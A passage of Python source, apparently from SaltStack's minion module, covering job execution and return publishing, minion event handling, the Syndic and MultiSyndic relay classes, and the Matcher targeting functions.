ret['out'] = 'nested'
except SaltInvocationError as exc:
log.error(
'Problem executing {0!r}: {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR executing {0!r}: {1}'.format(
function_name, exc
)
ret['out'] = 'nested'
except TypeError as exc:
msg = 'Passed invalid arguments: {0}\n{1}'.format(exc, func.__doc__)
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
ret['return'] = msg
ret['out'] = 'nested'
except Exception:
msg = 'The minion function caused an exception'
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data)
ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
ret['out'] = 'nested'
else:
ret['return'] = minion_instance.functions.missing_fun_string(function_name)
mod_name = function_name.split('.')[0]
if mod_name in minion_instance.function_errors:
ret['return'] += ' Possible reasons: {0!r}'.format(minion_instance.function_errors[mod_name])
ret['success'] = False
ret['retcode'] = 254
ret['out'] = 'nested'
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'master_id' in data:
ret['master_id'] = data['master_id']
if 'metadata' in data:
if isinstance(data['metadata'], dict):
ret['metadata'] = data['metadata']
else:
log.warning('The metadata parameter must be a dictionary. Ignoring.')
minion_instance._return_pub(ret)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
ret['id'] = opts['id']
for returner in set(data['ret'].split(',')):
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
log.error(traceback.format_exc())
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
salt.utils.appendproctitle(data['jid'])
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if not minion_instance:
minion_instance = cls(opts)
ret = {
'return': {},
'success': {},
}
for ind in range(0, len(data['fun'])):
ret['success'][data['fun'][ind]] = False
try:
func = minion_instance.functions[data['fun'][ind]]
args, kwargs = load_args_and_kwargs(
func,
data['arg'][ind],
data)
ret['return'][data['fun'][ind]] = func(*args, **kwargs)
ret['success'][data['fun'][ind]] = True
except Exception as exc:
trb = traceback.format_exc()
log.warning(
'The minion function caused an exception: {0}'.format(
exc
)
)
ret['return'][data['fun'][ind]] = trb
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'metadata' in data:
ret['metadata'] = data['metadata']
minion_instance._return_pub(ret)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
for returner in set(data['ret'].split(',')):
ret['id'] = opts['id']
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
def _return_pub(self, ret, ret_cmd='_return', timeout=60):
'''
Return the data from the executed command to the master server
'''
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: {0}'.format(jid))
channel = salt.transport.Channel.factory(self.opts)
if ret_cmd == '_syndic_return':
load = {'cmd': ret_cmd,
'id': self.opts['id'],
'jid': jid,
'fun': fun,
'arg': ret.get('arg'),
'tgt': ret.get('tgt'),
'tgt_type': ret.get('tgt_type'),
'load': ret.get('__load__')}
if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
load['return'] = {}
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load = {'cmd': ret_cmd,
'id': self.opts['id']}
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error('Invalid outputter {0}. This is likely a bug.'
.format(ret['out']))
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
fn_ = os.path.join(
self.opts['cachedir'],
'minion_jobs',
load['jid'],
'return.p')
jdir = os.path.dirname(fn_)
if not os.path.isdir(jdir):
os.makedirs(jdir)
salt.utils.fopen(fn_, 'w+b').write(self.serial.dumps(ret))
try:
ret_val = channel.send(load, timeout=timeout)
except SaltReqTimeoutError:
msg = ('The minion failed to return the job information for job '
'{0}. This is often due to the master being shut down or '
'overloaded. If the master is running consider increasing '
'the worker_threads value.').format(jid)
log.warn(msg)
return ''
log.trace('ret_val = {0}'.format(ret_val))
return ret_val
def _state_run(self):
'''
Execute a state run based on information set in the minion config file
'''
if self.opts['startup_states']:
data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
if self.opts['startup_states'] == 'sls':
data['fun'] = 'state.sls'
data['arg'] = [self.opts['sls_list']]
elif self.opts['startup_states'] == 'top':
data['fun'] = 'state.top'
data['arg'] = [self.opts['top_file']]
else:
data['fun'] = 'state.highstate'
data['arg'] = []
self._handle_decoded_payload(data)
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
'''
Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion
:param refresh_interval_in_minutes:
:return: None
'''
if '__update_grains' not in self.opts.get('schedule', {}):
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
self.opts['schedule'].update({
'__update_grains':
{
'function': 'event.fire',
'args': [{}, 'grains_refresh'],
'minutes': refresh_interval_in_minutes
}
})
def _fire_master_minion_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'minion_start'
)
# dup name spaced event
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'minion'),
)
def module_refresh(self, force_refresh=False, notify=False):
'''
Refresh the functions and returners.
'''
log.debug('Refreshing modules. Notify={0}'.format(notify))
self.functions, self.returners, _ = self._load_modules(force_refresh, notify=notify)
self.schedule.functions = self.functions
self.schedule.returners = self.returners
def pillar_refresh(self, force_refresh=False):
'''
Refresh the pillar
'''
log.debug('Refreshing pillar')
try:
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
).compile_pillar()
except SaltClientError:
# Do not exit if a pillar refresh fails.
log.error('Pillar data could not be refreshed. '
'One or more masters may be down!')
self.module_refresh(force_refresh)
def manage_schedule(self, package):
'''
Refresh the functions and returners.
'''
tag, data = salt.utils.event.MinionEvent.unpack(package)
func = data.get('func', None)
name = data.get('name', None)
schedule = data.get('schedule', None)
where = data.get('where', None)
if func == 'delete':
self.schedule.delete_job(name)
elif func == 'add':
self.schedule.add_job(schedule)
elif func == 'modify':
self.schedule.modify_job(name, schedule, where)
elif func == 'enable':
self.schedule.enable_schedule()
elif func == 'disable':
self.schedule.disable_schedule()
elif func == 'enable_job':
self.schedule.enable_job(name, where)
elif func == 'run_job':
self.schedule.run_job(name, where)
elif func == 'disable_job':
self.schedule.disable_job(name, where)
elif func == 'reload':
self.schedule.reload(schedule)
def manage_beacons(self, package):
'''
Manage Beacons
'''
tag, data = salt.utils.event.MinionEvent.unpack(package)
func = data.get('func', None)
name = data.get('name', None)
beacon_data = data.get('beacon_data', None)
if func == 'add':
self.beacons.add_beacon(name, beacon_data)
if func == 'delete':
self.beacons.delete_beacon(name)
def environ_setenv(self, package):
'''
Set the salt-minion main process environment according to
the data contained in the minion event data
'''
tag, data = salt.utils.event.MinionEvent.unpack(package)
environ = data.get('environ', None)
if environ is None:
return False
false_unsets = data.get('false_unsets', False)
clear_all = data.get('clear_all', False)
import salt.modules.environ as mod_environ
return mod_environ.setenv(environ, false_unsets, clear_all)
def clean_die(self, signum, frame):
'''
Python does not handle the SIGTERM cleanly, if it is signaled exit
the minion process cleanly
'''
self._running = False
exit(0)
def _pre_tune(self):
'''
Set the minion running flag and issue the appropriate warnings if
the minion cannot be started or is already running
'''
if self._running is None:
self._running = True
elif self._running is False:
log.error(
'This {0} was scheduled to stop. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
elif self._running is True:
log.error(
'This {0} is already running. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
try:
log.info(
'{0} is starting as user \'{1}\''.format(
self.__class__.__name__,
salt.utils.get_user()
)
)
except Exception as err:
# Only windows is allowed to fail here. See #3189. Log as debug in
# that case. Else, error.
log.log(
salt.utils.is_windows() and logging.DEBUG or logging.ERROR,
'Failed to get the user who is starting {0}'.format(
self.__class__.__name__
),
exc_info=err
)
def _mine_send(self, package):
'''
Send mine data to the master
'''
channel = salt.transport.Channel.factory(self.opts)
load = salt.utils.event.SaltEvent.unpack(package)[1]
load['tok'] = self.tok
ret = channel.send(load)
return ret
def handle_event(self, package):
'''
Handle an event from the epull_sock (all local minion events)
'''
log.debug('Handling event {0!r}'.format(package))
if package.startswith('module_refresh'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
self.module_refresh(notify=data.get('notify', False))
elif package.startswith('pillar_refresh'):
self.pillar_refresh()
elif package.startswith('manage_schedule'):
self.manage_schedule(package)
elif package.startswith('manage_beacons'):
self.manage_beacons(package)
elif package.startswith('grains_refresh'):
if self.grains_cache != self.opts['grains']:
self.pillar_refresh(force_refresh=True)
self.grains_cache = self.opts['grains']
elif package.startswith('environ_setenv'):
self.environ_setenv(package)
elif package.startswith('_minion_mine'):
self._mine_send(package)
elif package.startswith('fire_master'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
log.debug('Forwarding master event tag={tag}'.format(tag=data['tag']))
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
elif package.startswith('__master_disconnected'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
# if the master disconnect event is for a different master, raise an exception
if data['master'] != self.opts['master']:
raise Exception()
if self.connected:
# we are not connected anymore
self.connected = False
# modify the scheduled job to fire only on reconnect
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master': self.opts['master'],
'connected': False}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
log.info('Connection to master {0} lost'.format(self.opts['master']))
if self.opts['master_type'] == 'failover':
log.info('Trying to tune in to next master from master-list')
# if eval_master finds a new master for us, self.connected
# will be True again on successfull master authentication
self.opts['master'] = self.eval_master(opts=self.opts,
failed=True)
if self.connected:
# re-init the subsystems to work with the new master
log.info('Re-initialising subsystems for new '
'master {0}'.format(self.opts['master']))
del self.pub_channel
self._connect_master_future = self.connect_master()
self.block_until_connected() # TODO: remove
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# update scheduled job to run with the new master addr
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
elif package.startswith('__master_connected'):
# handle this event only once. otherwise it will pollute the log
if not self.connected:
log.info('Connection to master {0} re-established'.format(self.opts['master']))
self.connected = True
# modify the __master_alive job to only fire,
# if the connection is lost again
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
elif package.startswith('_salt_error'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
log.debug('Forwarding salt error event tag={tag}'.format(tag=tag))
self._fire_master(data, tag)
def _fallback_cleanups(self):
'''
Fallback cleanup routines, attempting to fix leaked processes, threads, etc.
'''
# Add an extra fallback in case a forked process leaks through
multiprocessing.active_children()
# Cleanup Windows threads
if not salt.utils.is_windows():
return
for thread in self.win_proc:
if not thread.is_alive():
thread.join()
try:
self.win_proc.remove(thread)
del thread
except (ValueError, NameError):
pass
# Main Minion Tune In
def tune_in(self, start=True):
'''
Lock onto the publisher. This is the main event loop for the minion
:rtype : None
'''
self._pre_tune()
# Properly exit if a SIGTERM is signalled
signal.signal(signal.SIGTERM, self.clean_die)
log.debug('Minion {0!r} trying to tune in'.format(self.opts['id']))
if start:
self.sync_connect_master()
salt.utils.event.AsyncEventPublisher(self.opts, self.handle_event, io_loop=self.io_loop)
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
# Make sure to gracefully handle CTRL_LOGOFF_EVENT
salt.utils.enable_ctrl_logoff_handler()
# On first startup execute a state run if configured to do so
self._state_run()
loop_interval = self.opts['loop_interval']
try:
if self.opts['grains_refresh_every']: # If exists and is not zero. In minutes, not seconds!
if self.opts['grains_refresh_every'] > 1:
log.debug(
'Enabling the grains refresher. Will run every {0} minutes.'.format(
self.opts['grains_refresh_every'])
)
else: # Clean up minute vs. minutes in log message
log.debug(
'Enabling the grains refresher. Will run every {0} minute.'.format(
self.opts['grains_refresh_every'])
)
self._refresh_grains_watcher(
abs(self.opts['grains_refresh_every'])
)
except Exception as exc:
log.error(
'Exception occurred in attempt to initialize grain refresh routine during minion tune-in: {0}'.format(
exc)
)
self.periodic_callbacks = {}
# schedule the stuff that runs every interval
ping_interval = self.opts.get('ping_interval', 0) * 60
if ping_interval > 0:
def ping_master():
self._fire_master('ping', 'minion_ping')
self.periodic_callbacks['ping'] = tornado.ioloop.PeriodicCallback(ping_master, ping_interval * 1000, io_loop=self.io_loop)
self.periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(self._fallback_cleanups, loop_interval * 1000, io_loop=self.io_loop)
def handle_beacons():
# Process Beacons
try:
beacons = self.process_beacons(self.functions)
except Exception:
log.critical('The beacon errored: ', exc_info=True)
if beacons:
self._fire_master(events=beacons)
self.periodic_callbacks['beacons'] = tornado.ioloop.PeriodicCallback(handle_beacons, loop_interval * 1000, io_loop=self.io_loop)
# TODO: actually listen to the return and change period
def handle_schedule():
self.process_schedule(self, loop_interval)
self.periodic_callbacks['schedule'] = tornado.ioloop.PeriodicCallback(handle_schedule, 1000, io_loop=self.io_loop)
# start all the other callbacks
for periodic_cb in self.periodic_callbacks.itervalues():
periodic_cb.start()
# add handler to subscriber
self.pub_channel.on_recv(self._handle_payload)
if start:
self.io_loop.start()
def _handle_payload(self, payload):
if payload is not None and self._target_load(payload['load']):
self._handle_decoded_payload(payload['load'])
def _target_load(self, load):
# Verify that the publication is valid
if 'tgt' not in load or 'jid' not in load or 'fun' not in load \
or 'arg' not in load:
return False
# Verify that the publication applies to this minion
# It's important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G 'grain_key:grain_val' test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
if 'tgt_type' in load:
match_func = getattr(self.matcher,
'{0}_match'.format(load['tgt_type']), None)
if match_func is None:
return False
if load['tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
delimiter = load.get('delimiter', DEFAULT_TARGET_DELIM)
if not match_func(load['tgt'], delimiter=delimiter):
return False
elif not match_func(load['tgt']):
return False
else:
if not self.matcher.glob_match(load['tgt']):
return False
return True
def destroy(self):
'''
Tear down the minion
'''
self._running = False
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
del self.pub_channel
if hasattr(self, 'periodic_callbacks'):
for cb in self.periodic_callbacks.itervalues():
cb.stop()
def __del__(self):
self.destroy()
class Syndic(Minion):
'''
Make a Syndic minion, this minion will use the minion keys on the
master to authenticate with a higher level master.
'''
def __init__(self, opts, **kwargs):
self._syndic_interface = opts.get('interface')
self._syndic = True
# force auth_safemode True because Syndic don't support autorestart
opts['auth_safemode'] = True
opts['loop_interval'] = 1
super(Syndic, self).__init__(opts, **kwargs)
self.mminion = salt.minion.MasterMinion(opts)
self.jid_forward_cache = set()
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
# TODO: even do this??
data['to'] = int(data.get('to', self.opts['timeout'])) - 1
# Only forward the command if it didn't originate from ourselves
if data.get('master_id', 0) != self.opts.get('master_id', 1):
self.syndic_cmd(data)
def syndic_cmd(self, data):
'''
Take the now clear load and forward it on to the client cmd
'''
# Set up default tgt_type
if 'tgt_type' not in data:
data['tgt_type'] = 'glob'
kwargs = {}
# optionally add a few fields to the publish data
for field in ('master_id', # which master the job came from
'user', # which user ran the job
):
if field in data:
kwargs[field] = data[field]
try:
# Send out the publication
self.local.pub(data['tgt'],
data['fun'],
data['arg'],
data['tgt_type'],
data['ret'],
data['jid'],
data['to'],
**kwargs)
except Exception as exc:
log.warning('Unable to forward pub data: {0}'.format(exc))
def _fire_master_syndic_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'syndic_start'
)
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'syndic'),
)
# Syndic Tune In
def tune_in(self, start=True):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
signal.signal(signal.SIGTERM, self.clean_die)
log.debug('Syndic {0!r} trying to tune in'.format(self.opts['id']))
if start:
self.sync_connect_master()
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
self.local.event.subscribe('')
self.local.opts['interface'] = self._syndic_interface
# add handler to subscriber
self.pub_channel.on_recv(self._process_cmd_socket)
# register the event sub to the poller
self._reset_event_aggregation()
self.local_event_stream = zmq.eventloop.zmqstream.ZMQStream(self.local.event.sub, io_loop=self.io_loop)
self.local_event_stream.on_recv(self._process_event)
# forward events every syndic_event_forward_timeout
self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
self.opts['syndic_event_forward_timeout'] * 1000,
io_loop=self.io_loop)
self.forward_events.start()
# Send an event to the master that the minion is live
self._fire_master_syndic_start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
if start:
self.io_loop.start()
# TODO: clean up docs
def tune_in_no_block(self):
'''
Executes the tune_in sequence but omits extra logging and the
management of the event bus assuming that these are handled outside
the tune_in sequence
'''
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
# add handler to subscriber
self.pub_channel.on_recv(self._process_cmd_socket)
def _process_cmd_socket(self, payload):
if payload is not None:
log.trace('Handling payload')
self._handle_decoded_payload(payload['load'])
def _reset_event_aggregation(self):
self.jids = {}
self.raw_events = []
def _process_event(self, raw):
# TODO: cleanup: Move down into event class
raw = raw[0]
mtag, data = self.local.event.unpack(raw, self.local.event.serial)
event = {'data': data, 'tag': mtag}
log.trace('Got event {0}'.format(event['tag']))
tag_parts = event['tag'].split('/')
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in event['data']:
if 'jid' not in event['data']:
# Not a job return
return
jdict = self.jids.setdefault(event['tag'], {})
if not jdict:
jdict['__fun__'] = event['data'].get('fun')
jdict['__jid__'] = event['data']['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if event['data']['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](event['data']['jid'])
)
self.jid_forward_cache.add(event['data']['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if 'master_id' in event['data']:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = event['data']['master_id']
jdict[event['data']['id']] = event['data']['return']
else:
# Add generic event aggregation here
if 'retcode' not in event['data']:
self.raw_events.append(event)
def _forward_events(self):
log.trace('Forwarding events')
if self.raw_events:
self._fire_master(events=self.raw_events,
pretag=tagify(self.opts['id'], base='syndic'),
)
for jid in self.jids:
self._return_pub(self.jids[jid], '_syndic_return')
self._reset_event_aggregation()
def destroy(self):
'''
Tear down the syndic minion
'''
# We borrowed the local clients poller so give it back before
# it's destroyed. Reset the local poller reference.
super(Syndic, self).destroy()
if hasattr(self, 'local'):
del self.local
if hasattr(self, 'forward_events'):
self.forward_events.stop()
# TODO: consolidate syndic classes together?
# need a way of knowing if the syndic connection is busted
class MultiSyndic(MinionBase):
'''
Make a MultiSyndic minion, this minion will handle relaying jobs and returns from
all minions connected to it to the list of masters it is connected to.
Modes (controlled by `syndic_mode`:
sync: This mode will synchronize all events and publishes from higher level masters
cluster: This mode will only sync job publishes and returns
Note: jobs will be returned best-effort to the requesting master. This also means
(since we are using zmq) that if a job was fired and the master disconnects
between the publish and return, that the return will end up in a zmq buffer
in this Syndic headed to that original master.
In addition, since these classes all seem to use a mix of blocking and non-blocking
calls (with varying timeouts along the way) this daemon does not handle failure well,
it will (under most circumstances) stall the daemon for ~15s trying to forward events
to the down master
'''
# time to connect to upstream master
SYNDIC_CONNECT_TIMEOUT = 5
SYNDIC_EVENT_TIMEOUT = 5
def __init__(self, opts, io_loop=None):
opts['loop_interval'] = 1
super(MultiSyndic, self).__init__(opts)
self.mminion = salt.minion.MasterMinion(opts)
# sync (old behavior), cluster (only returns and publishes)
self.syndic_mode = self.opts.get('syndic_mode', 'sync')
self._has_master = threading.Event()
self.jid_forward_cache = set()
if io_loop is None:
self.io_loop = zmq.eventloop.ioloop.ZMQIOLoop()
else:
self.io_loop = io_loop
self.io_loop.install()
def _spawn_syndics(self):
'''
Spawn all the coroutines which will sign in the syndics
'''
self._syndics = {} # mapping of opts['master'] -> syndic
for master in set(self.opts['master']):
s_opts = copy.copy(self.opts)
s_opts['master'] = master
self._syndics[master] = self._connect_syndic(s_opts)
@tornado.gen.coroutine
def _connect_syndic(self, opts):
'''
Create a syndic, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = opts['acceptance_wait_time']
while True:
log.debug('Syndic attempting to connect to {0}'.format(opts['master']))
try:
syndic = Syndic(opts,
timeout=self.SYNDIC_CONNECT_TIMEOUT,
safe=False,
io_loop=self.io_loop,
)
yield syndic.connect_master()
# set up the syndic to handle publishes (specifically not event forwarding)
syndic.tune_in_no_block()
log.info('Syndic successfully connected to {0}'.format(opts['master']))
break
except SaltClientError as exc:
log.error('Error while bringing up syndic for multi-syndic. Is master at {0} responding?'.format(opts['master']))
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except KeyboardInterrupt:
raise
except: # pylint: disable=W0702
log.critical('Unexpected error while connecting to {0}'.format(opts['master']), exc_info=True)
raise tornado.gen.Return(syndic)
def _mark_master_dead(self, master):
'''
Mark a master as dead. This will start the sign-in routine
'''
# if its connected, mark it dead
if self._syndics[master].done():
syndic = self._syndics.result()
syndic.destroy()
self._syndics[master] = self._connect_syndic(syndic.opts)
else:
log.info('Attempting to mark {0} as dead, although it is already marked dead'.format(master)) # TODO: debug?
def _call_syndic(self, func, args=(), kwargs=None, master_id=None):
'''
Wrapper to call a given func on a syndic, best effort to get the one you asked for
'''
if kwargs is None:
kwargs = {}
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error('Unable to call {0} on {1}, that syndic is not connected'.format(func, master_id))
continue
try:
getattr(syndic_future.result(), func)(*args, **kwargs)
return
except SaltClientError:
log.error('Unable to call {0} on {1}, trying another...'.format(func, master_id))
self._mark_master_dead(master)
continue
log.critical('Unable to call {0} on any masters!'.format(func))
def iter_master_options(self, master_id=None):
'''
Iterate (in order) over your options for master
'''
masters = list(self._syndics.keys())
shuffle(masters)
if master_id not in self._syndics:
master_id = masters.pop(0)
else:
masters.remove(master_id)
while True:
yield master_id, self._syndics[master_id]
if len(masters) == 0:
break
master_id = masters.pop(0)
def _reset_event_aggregation(self):
self.jids = {}
self.raw_events = []
# Syndic Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
self._spawn_syndics()
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
self.local.event.subscribe('')
log.debug('MultiSyndic {0!r} trying to tune in'.format(self.opts['id']))
# register the event sub to the poller
self._reset_event_aggregation()
self.local_event_stream = zmq.eventloop.zmqstream.ZMQStream(self.local.event.sub, io_loop=self.io_loop)
self.local_event_stream.on_recv(self._process_event)
# forward events every syndic_event_forward_timeout
self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
self.opts['syndic_event_forward_timeout'] * 1000,
io_loop=self.io_loop)
self.forward_events.start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
self.io_loop.start()
def _process_event(self, raw):
# TODO: cleanup: Move down into event class
raw = raw[0]
mtag, data = self.local.event.unpack(raw, self.local.event.serial)
event = {'data': data, 'tag': mtag}
log.trace('Got event {0}'.format(event['tag']))
tag_parts = event['tag'].split('/')
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in event['data']:
if 'jid' not in event['data']:
# Not a job return
return
if self.syndic_mode == 'cluster' and event['data'].get('master_id', 0) == self.opts.get('master_id', 1):
log.debug('Return recieved with matching master_id, not forwarding')
return
jdict = self.jids.setdefault(event['tag'], {})
if not jdict:
jdict['__fun__'] = event['data'].get('fun')
jdict['__jid__'] = event['data']['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if event['data']['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](event['data']['jid'])
)
self.jid_forward_cache.add(event['data']['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if 'master_id' in event['data']:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = event['data']['master_id']
jdict[event['data']['id']] = event['data']['return']
else:
# TODO: config to forward these? If so we'll have to keep track of who
# has seen them
# if we are the top level masters-- don't forward all the minion events
if self.syndic_mode == 'sync':
# Add generic event aggregation here
if 'retcode' not in event['data']:
self.raw_events.append(event)
def _forward_events(self):
log.trace('Forwarding events')
if self.raw_events:
self._call_syndic('_fire_master',
kwargs={'events': self.raw_events,
'pretag': tagify(self.opts['id'], base='syndic'),
'timeout': self.SYNDIC_EVENT_TIMEOUT,
},
)
for jid, jid_ret in self.jids.items():
self._call_syndic('_return_pub',
args=(jid_ret, '_syndic_return'),
kwargs={'timeout': self.SYNDIC_EVENT_TIMEOUT},
master_id=jid_ret.get('__master_id__'),
)
self._reset_event_aggregation()
class Matcher(object):
'''
Use to return the value for matching calls from the master
'''
def __init__(self, opts, functions=None):
self.opts = opts
self.functions = functions
def confirm_top(self, match, data, nodegroups=None):
'''
Takes the data passed to a top file environment and determines if the
data matches this minion
'''
matcher = 'compound'
if not data:
log.error('Received bad data when setting the match from the top '
'file')
return False
for item in data:
if isinstance(item, dict):
if 'match' in item:
matcher = item['match']
if hasattr(self, matcher + '_match'):
funcname = '{0}_match'.format(matcher)
if matcher == 'nodegroup':
return getattr(self, funcname)(match, nodegroups)
return getattr(self, funcname)(match)
else:
log.error('Attempting to match with unknown matcher: {0}'.format(
matcher
))
return False
def glob_match(self, tgt):
'''
Returns true if the passed glob matches the id
'''
if not isinstance(tgt, six.string_types):
return False
return fnmatch.fnmatch(self.opts['id'], tgt)
def pcre_match(self, tgt):
'''
Returns true if the passed pcre regex matches
'''
return bool(re.match(tgt, self.opts['id']))
def list_match(self, tgt):
'''
Determines if this host is on the list
'''
if isinstance(tgt, six.string_types):
tgt = tgt.split(',')
return bool(self.opts['id'] in tgt)
def grain_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the grains glob match
'''
log.debug('grains target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['grains'], tgt, delimiter=delimiter
)
def grain_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Matches a grain based on regex
'''
log.debug('grains pcre target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains pcre match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['grains'], tgt,
delimiter=delimiter, regex_match=True)
def data_match(self, tgt):
'''
Match based on the local data store on the minion
'''
if self.functions is None:
utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=utils)
comps = tgt.split(':')
if len(comps) < 2:
return False
val = self.functions['data.getval'](comps[0])
if val is None:
# The value is not defined
return False
if isinstance(val, list):
# We are matching a single component to a single list member
for member in val:
if fnmatch.fnmatch(str(member).lower(), comps[1].lower()):
return True
return False
if isinstance(val, dict):
if comps[1] in val:
return True
return False
return bool(fnmatch.fnmatch(
val,
comps[1],
))
def pillar_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar glob match
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter
)
def pillar_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar pcre match
'''
log.debug('pillar PCRE target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar PCRE match '
'statement from master')
return False
return salt.utils.subdict_match(
